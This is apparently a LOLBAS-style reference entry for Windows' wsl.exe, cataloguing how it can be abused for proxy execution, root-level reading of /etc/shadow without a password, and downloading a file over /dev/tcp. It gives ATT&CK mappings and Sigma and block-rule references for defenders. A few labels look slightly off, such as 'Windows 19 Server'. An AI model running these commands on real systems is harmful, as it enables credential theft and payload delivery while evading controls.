.. /Wsl.exe
Star

Windows subsystem for Linux executable

Paths:

C:\Windows\System32\wsl.exe

Resources:

Acknowledgements:

Alex Ionescu (@aionescu)
Matt (@NotoriousRebel1)
Asif Matadar (@d1r4c)
Nasreddine Bencherchali (@nas_bench)

Detection:

Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml
BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
IOC: Child process from wsl.exe

Execute

Executes calc.exe from wsl.exe

wsl.exe -e /mnt/c/Windows/System32/calc.exe

Usecase: Performs execution of specified file, can be used to execute arbitrary Linux commands.
Privileges required: User
OS: Windows 10, Windows 19 Server
MITRE ATT&CK®: T1202

Cats /etc/shadow file as root

wsl.exe -u root -e cat /etc/shadow

Usecase: Performs execution of arbitrary Linux commands as root without need for password.
Privileges required: User
OS: Windows 10, Windows 19 Server
MITRE ATT&CK®: T1202

Cats /etc/shadow file as root

wsl.exe --exec bash -c 'cat file'

Usecase: Performs execution of arbitrary Linux commands.
Privileges required: User
OS: Windows 10, Windows 19 Server
MITRE ATT&CK®: T1202

Execute the command as root

wsl.exe --system calc.exe

Usecase: Performs execution of arbitrary Linux commands as root without need for password.
Privileges required: User
OS: Windows 11
MITRE ATT&CK®: T1202

Download

Downloads file from 192.168.1.10

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

Usecase: Download file
Privileges required: User
OS: Windows 10, Windows 19 Server
MITRE ATT&CK®: T1202

.. /Wsl.exe Star

Execute

Download

.. /Wsl.exe
Star